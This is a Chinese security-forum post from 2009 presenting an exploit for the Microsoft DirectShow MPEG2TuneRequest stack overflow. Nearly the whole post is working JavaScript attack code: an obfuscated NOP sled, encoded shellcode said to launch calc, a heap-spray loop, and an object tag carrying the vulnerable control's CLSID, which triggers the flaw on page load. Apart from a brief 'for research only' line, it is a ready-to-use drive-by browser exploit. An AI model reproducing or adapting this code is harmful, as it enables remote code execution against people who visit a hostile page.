Board logo

标题: Microsoft DirectShow MPEG2TuneRequest Stack Overflow Exploit [打印本页]

作者: 柔肠寸断    时间: 2009-7-5 22:38     标题: Microsoft DirectShow MPEG2TuneRequest Stack Overflow Exploit

  1. Microsoft DirectShow存在可被远程利用的堆栈溢出漏洞。

  2. 关键代码如下:

  3. 该shellcode会执行calc
  4. -------------------------以下内容有危险,仅为研究使用--------------
  5. var appllaa='0';

  6. var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;

  7. var dashell=unescape(nndx+"%u03eb%ueb59%ue805%ufff8%uffff%u4937%u4949%u4949%u4949%u4949" +

  8. "%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4130%u416b" +

  9. "%u5541%u4132%u3242%u4242%u4142%u4230%u5841%u3850%u4241%u7875" +

  10. "%u7969%u6d6c%u3038%u6544%u7550%u7350%u6e30%u516b%u7755%u4c4c" +

  11. "%u414b%u656c%u3355%u4348%u3831%u4c6f%u304b%u464f%u4c78%u314b" +

  12. "%u374f%u3450%u4a41%u624b%u4e69%u666b%u6e54%u666b%u6a61%u304e" +

  13. "%u3931%u4f50%u4c69%u6f6c%u5974%u3450%u3534%u5957%u7951%u565a" +

  14. "%u776d%u6f71%u7832%u6b6b%u6744%u714b%u6744%u7754%u3474%u4b35" +

  15. "%u6e55%u436b%u466f%u6544%u3851%u506b%u4c66%u564b%u306c%u4c4b" +

  16. "%u414b%u374f%u656c%u5a51%u6c4b%u654b%u4c4c%u674b%u6871%u6e6b" +

  17. "%u7169%u654c%u6674%u5964%u4653%u4951%u6550%u6c34%u634b%u3470" +

  18. "%u4b70%u4b35%u5470%u3438%u6e4c%u436b%u6670%u4e6c%u626b%u7550" +

  19. "%u4c4c%u6e6d%u536b%u3758%u4a78%u554b%u4c59%u6d4b%u6e50%u6550" +

  20. "%u6550%u4750%u6c70%u434b%u6558%u716c%u464f%u5a51%u4156%u3070" +

  21. "%u4d56%u6c59%u4e38%u4963%u7150%u526b%u7570%u7138%u4b6e%u4b68" +

  22. "%u3152%u6563%u4c38%u5958%u6e6e%u746a%u714e%u4b47%u7a4f%u7047" +

  23. "%u6363%u5251%u634c%u5553%u4550");

  24. var headersize=20;

  25. var omybro=unescape(nndx);

  26. var slackspace=headersize+dashell.length;

  27. while(omybro.length<slackspace)

  28. omybro+=omybro;

  29. bZmybr=omybro.substring(0,slackspace);

  30. shuishiMVP=omybro.substring(0,omybro.length-slackspace);

  31. while(shuishiMVP.length+slackspace<0x30000)

  32. shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;

  33. memory=new Array();

  34. for(x=0;x<300;x++)

  35. memory[x]=shuishiMVP+dashell;

  36. var myObject=document.createElement('object');

  37. DivID.appendChild(myObject);

  38. myObject.width='1';

  39. myObject.height='1';

  40. myObject.data='./logo.gif';

  41. myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

  42. -------------------------------------
复制代码





欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2